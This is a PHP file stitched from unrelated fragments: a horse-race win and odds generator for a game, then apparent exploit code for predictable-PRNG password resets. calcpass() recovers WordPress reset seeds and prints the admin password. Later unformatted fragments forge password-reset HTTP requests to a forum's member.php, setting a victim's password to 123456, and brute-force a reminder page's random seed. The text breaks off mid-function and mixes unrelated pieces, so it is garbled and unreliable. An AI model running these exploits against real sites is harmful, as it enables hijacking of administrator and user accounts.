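/**
 * Distributes $races_count wins over $horses_count horses and derives a payout
 * coefficient and a name for each horse.
 *
 * Results are written to the globals $horses_wins, $horses_coefficients and
 * $horses_names (1-based). Names come from ut_gladiator_names ordered by
 * MySQL's rand() seeded with $seed, so the name order is reproducible from the
 * seed; the win counts use PHP's rand(), which is left auto-seeded (the
 * commented-out srand($seed) of the original is not restored: reseeding from a
 * time-derived value would make the race outcome reproducible by anyone who
 * can guess that value).
 *
 * @param int|false $seed seed for MySQL rand(); when falsy, getseed() (defined
 *                        elsewhere) derives one from the current time and $cnt
 * @return void
 */
function horses_generate($seed)
{
    global $horses_wins, $cnt, $horses_count, $races_count, $horses_coefficients, $horses_names;

    if (!$seed) {
        $seed = getseed(time() + 30 * 60 * $cnt);
    }
    srand();

    // Both interpolated values are numeric by nature; casting them keeps the
    // query independent of wherever the caller obtained $seed.
    $res1 = runsql(sprintf(
        "select Name from ut_gladiator_names where CountryID='1' order by rand(%d) limit 0,%d",
        (int) $seed,
        (int) $horses_count
    ));

    $remaining = $races_count; // wins not yet handed out
    for ($i = 1; $i <= $horses_count; $i++) {
        // Upper bound leaves at least one win for every horse still to come.
        // (The original read `$s + i - ...`: bare `i` is an undefined constant,
        // a fatal Error on PHP 8 and effectively 0 on older versions.)
        $maxWins = $remaining + $i - $horses_count;
        if ($i == $horses_count) {
            $horses_wins[$i] = $remaining; // last horse takes whatever is left
        } elseif ($i == 1) {
            $horses_wins[$i] = round(rand(1, $maxWins) / 2); // first horse gets half its draw
        } else {
            $horses_wins[$i] = rand(1, $maxWins);
        }
        // When $races_count < $horses_count the bound drops below 1 and rand()
        // can return 0 or a negative value; a win count below 1 would divide
        // by zero or give a negative coefficient below.
        if ($horses_wins[$i] < 1) {
            $horses_wins[$i] = 1;
        }
        $remaining -= $horses_wins[$i];

        // +-10% jitter on the fair coefficient. rand() takes ints only, so the
        // original rand(-0.1, 0.1) always yielded 0; rand(-1, 1) / 10 restores
        // the evident intent.
        $jitter = rand(-1, 1) / 10;
        $horses_coefficients[$i] = round($races_count / $horses_wins[$i] * (0.9 + $jitter), 1);

        // Fewer rows than horses: keep a null name instead of indexing false.
        $r1 = mysql_fetch_array($res1);
        $horses_names[$i] = $r1 ? $r1[0] : null;
    }
}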
/**
 * Recomputes the password an old WordPress release generated during a
 * password reset, given the reset key that was mailed out.
 *
 * The computation appears to rest on one weakness: reset key and new password
 * are both drawn from mt_rand(), a PRNG fully determined by its 32-bit seed,
 * so recovering the seed (getseed() searches for it from the key; defined
 * elsewhere) lets the stream be replayed. Mitigation: derive reset keys and
 * generated passwords from a CSPRNG (random_bytes()/random_int()) rather than
 * mt_rand()/rand(), and never depend on a guessable mt_srand() seed.
 *
 * @param string    $resetkey reset key as received by mail
 * @param int|false $seed     known mt_srand() seed; false to recover it from $resetkey
 * @return string the recomputed password (also echoed)
 */
function calcpass($resetkey, $seed = false)
{
    // Presumably probes a mt_srand() defect of old PHP builds: two different
    // seeds yielding the same first mt_rand() value. The result only selects
    // the 'fast'/'slow' label here; note define() warns if this function runs
    // twice in one process.
    mt_srand(2);
    $a = mt_rand();
    mt_srand(3);
    $b = mt_rand();
    define('BUGGY', $a == $b);
    echo "[-] wpress password computation. runnig in " . (BUGGY ? 'fast' : 'slow') . " mode\n";
    echo "[+] got key {$resetkey} via mail\n";
    if (!$seed) {
        $seed = getseed($resetkey);
    }
    // getseed() signals failure with false; the message says the search only
    // matches when the local PHP version behaves like the target's (< 5.2.5).
    if ($seed === false) {
        die("[!] seed not found :( try using identical php version (< 5.2.5)\n");
    }
    // Replay the stream: after reseeding, the first 20-char draw is expected to
    // reproduce the reset key and the following draw is the password that was set.
    mt_srand($seed);
    echo "[-] seed for key " . wp_generate_password(20, false) . " is {$seed}\n";
    $pass = wp_generate_password();
    echo "[+] new credentials are admin:{$pass}\n";
    return $pass;
}
$data .= "Referer: http://{$host}{$path}\r\n"; $data .= "Host: {$host}\r\n"; $data .= "Content-Length: " . strlen($cmd) . "\r\n"; $data .= "Connection: close\r\n\r\n"; $data .= $cmd; fputs($fp, $data); $resp = ''; while ($fp && !feof($fp)) { $resp .= fread($fp, 1024); } fclose($fp); preg_match('/Set-Cookie:\\s[a-zA-Z0-9]+_sid=([a-zA-Z0-9]{6});/', $resp, $sid); if (!$sid) { exit("Exploit Failed!\n"); } $seed = getseed(); if ($seed) { mt_srand($seed); random(); mt_rand(); $id = random(); $fp = fsockopen($host, 80); $cmd = 'action=getpasswd&uid=' . $uid . '&id=' . $id . '&newpasswd1=123456&newpasswd2=123456&getpwsubmit=true&formhash=' . $hash[1]; $data = "POST " . $path . "member.php HTTP/1.1\r\n"; $data .= "Content-Type: application/x-www-form-urlencoded\r\n"; $data .= "Referer: http://{$host}{$path}\r\n"; $data .= "Host: {$host}\r\n"; $data .= "Content-Length: " . strlen($cmd) . "\r\n"; $data .= "Connection: close\r\n\r\n"; $data .= $cmd; fputs($fp, $data);
$packet = "GET {$path}index.php?action=reminder HTTP/1.1\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cookie: PHPSESSID={$sess};\r\n"; $packet .= "Keep-Alive: 300\r\n"; $packet .= "Connection: keep-alive\r\n\r\n"; fputs($ock, $packet); while (!feof($ock)) { $resp = fgets($ock); preg_match('@name="sc" value="([0-9a-f]+)"@i', $resp, $out); if (isset($out[1])) { $md5 = $out[1]; break; } } if ($md5) { $seed = getseed($md5); if ($seed) { echo "[+] Seed for next random number is {$seed}\n"; } else { die("[-] Can't calculate seed\n"); } } else { die("[-] Random number hash not found\n"); } function getseed($md5) { global $sess; for ($i = 0; $i <= 32767; $i++) { if ($md5 == md5($sess . $i)) { return $i; }